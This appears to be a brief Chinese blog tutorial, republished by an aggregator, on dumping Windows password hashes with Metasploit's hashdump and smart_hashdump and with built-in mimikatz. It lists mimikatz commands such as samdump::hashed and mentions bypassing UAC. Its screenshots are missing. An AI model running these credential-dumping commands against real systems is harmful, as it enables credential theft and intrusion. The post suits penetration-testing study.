msf之hash攻击

Posted -qing-

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了msf之hash攻击相关的知识,希望对你有一定的参考价值。

 使用hashdump抓取密码(需要系统管理权限)

技术图片

 

另外一个更强大的模块 smart_hashdump

技术图片

 

 

如果目标是win7 就需要先绕过UAC 

 

还可以使用msf内置的mimikatz抓取hash

技术图片

msv

技术图片

 

kerberos 抓取系统票据

 

 技术图片

wdigest 获取系统账户信息

技术图片

 

mimikatz_command -f samdump::hashed 抓取hash

mimikatz_command -f handle::list 查看进程

mimikatz_command -f service::list windows 服务

mimikatz_command -f crypto::listProviders 查看系统证书 支持PowerShell调用(Invoke-Mimikatz)

 

以上是关于msf之hash攻击的主要内容,如果未能解决你的问题,请参考以下文章

学习日记1:用msf工具利用永恒之蓝漏洞攻击靶机

跳板攻击之:MSF portfwd 端口转发与端口映射

MSF应用基础

基于Armitage的MSF自动化漏洞攻击实践

使用MSF渗透攻击win7主机并远程执行命令

密码学系列之:碰撞抵御和碰撞攻击collision attack